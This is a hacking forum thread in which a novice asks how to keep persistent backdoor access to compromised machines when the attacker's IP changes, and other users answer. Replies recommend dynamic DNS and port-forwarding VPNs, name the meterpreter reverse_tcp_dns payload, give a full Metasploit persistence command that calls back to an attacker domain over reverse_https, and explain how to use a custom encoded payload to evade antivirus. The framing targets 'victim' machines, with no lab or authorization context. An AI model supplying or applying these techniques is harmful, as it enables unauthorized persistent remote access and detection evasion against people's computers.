Forum Thread: Persistent Backdoor QuestioN

Hello guys,

Rookie here, so i was watching OTW series, and i have a couple of questions,

lets imagine that i want to compromise some machines, and i want to have a persistent acess to it, in a WAN and LAN environment, since when you make a payload the LHOST cant be changed after being executed in the victim machine so how can I resolve this problem, and other thing in a WAN environment i dont have a fixed public IP so how can i workarround this, since my ip changes.

Ty for your time

11 Responses

I think you are looking for something called dynamic DNS.

-Phoenix750

Yeah i though of noip, but wasnt sure

1 more question, if im a public place like a caffe or school, and i have a reverse connection in port 4444 for example can i receive it? since the AP its probably not portfoward on port 4444?

No. Unless you use a port-forwarding VPN which wouldn't matter where you are.

So just to confirm and make it simple,
WAN -> LHOST noip
receive reverse connection anywhere -> Being connected to port foward VPN

Am i right?

ty btw

Well, DNS doesnt work as LHOST in most payloads and the reversetcpdns payload only works on 32bit

most 32 bit payloads work on 64 bit systems aswell i think.

-Phoenix750

use noip and after compromising the system execute persistence.
example of the command i use after i get a meterpreter session in WAN environment:
run persistence –A –L C:\\ -P windows/meterpreter/reverse_https -X 30 –p 443 –r hacker.noip.biz

ty man, and btw in lan environment can i dynamically change the private IP? i guess not but maybe you guys know something that i dont

You can just set that as an autoscript so that when you get the meterpreter shell it automatically executes (in case you arent near your computer when the shell opens)

If you want the meterpreter to resolve your no-ip adress you need to use meterpreter reverse_tcp_dns. And for the persistence you better use exploit/windows/local/persistence module since the integrated persistence in meterpreter is definitely going to be detected if the victim has any AV. use EXE::Custom advanced option to deliver an encoded or special payload that is better in evading the AV. -Ne-py

Seems good, ty for your time

Share Your Thoughts

  • Hot
  • Active